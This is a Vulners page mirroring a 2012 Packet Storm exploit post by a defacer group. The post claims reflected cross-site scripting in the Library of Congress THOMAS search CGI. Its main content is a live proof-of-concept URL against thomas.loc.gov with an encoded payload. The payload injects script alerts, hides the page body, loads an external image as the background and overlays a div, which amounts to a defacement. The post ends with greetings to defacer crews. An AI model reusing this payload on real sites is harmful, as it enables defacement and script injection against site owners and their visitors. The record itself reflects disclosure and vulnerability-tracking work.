Lucene search
K

THOMAS (The Library Of Congress) Cross Site Scripting

🗓️ 29 Mar 2012 00:00:00Reported by Ryuzaki LawletType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Vulnerability in THOMAS Library of Congress allows Cross Site Scripting attacks via specific inputs.

Code
`# Exploit Title: THOMAS (The Library of Congress)Cross Site Scripting  
# Google Dork: -  
# Date: 26/3/2012 1:35 AM (Malaysia)  
# Author: Ryuzaki Lawlet  
# Blog: http://justryuz.blogspot.com  
# Tested on: Linux (OSHIRIX)  
# CVE : XSS  
  
######Vulnerable########  
  
Vulnerable : http://thomas.loc.gov/cgi-bin/query/z?c112=  
  
######Live Preview########  
  
Sites:  
http://thomas.loc.gov/cgi-bin/query/z?c112=%20wo.0t??%20by%20Ryuzaki%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22wo.0t??%20by%20Ryuzaki%22%29%3C/script  
%3E%3Cscript%3Ealert%28%22http://justryuz.blogspot.com%22%29%3C/script%3E%3Cscript%3Ealert%28%22Cyb3rSec%20Crew%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28https://fbcdn-profile-a.akamaihd.net/hprofile-ak-snc4/277062_207390472645570_423082005_n.jpg%29;%20}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3C/div%3E#185  
  
######Preview########  
  
Screen shot  
  
http://3.bp.blogspot.com/-W6yDC4HvuKc/T29YMGql3nI/AAAAAAAAAk8/cmdBqBeVsYc/s1600/xss.png  
  
  
######Credit########  
  
Source:   
http://justryuz.blogspot.com/2012/03/wo0t-thomas-library-of-congresscross.html  
  
Antuwebhunt3r| Md Lothdh | Ben CyberSEC | Misa CyberSEC | Sbkiller CyberSEC | Xay CyberSEC | Kejung$ CyberSEC | Biang Rusuh | Afnum vvip | HambaMalam | shah RC | Cak vvip | Lod vvip | Fakyu Tuyu | Alex John NEC | Dark Angel NEC | Cyg Selalu | chliz Aceh | Breackerz Code | Dboyz vvip | AgoenkJR | Misz Nadea | Lone Ranger vvip | Nick Keluang Johor | bl4ckm4gicx NEC | Pak Kordi NEC | b0ogle | Ana dira | pamy | cik din | Jack RC | Thaqif CyberSEC | Hayate DevilSec | KiSSierra | Mike | Syakiller | Hidden Pain | Gilang | MagmaCode RC | MASOKISME and all member | Mambang Oshirix Team | CyberSEC | RileksCrew | Newbie3vilc063s | h3x4 Crew | T3D Hackers | Cyber 4rmy | Indonesia Defacer | Turki Defacer | Pakistan Defacer & Gaza Defacer  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Mar 2012 00:00Current
0.1Low risk
Vulners AI Score0.1
25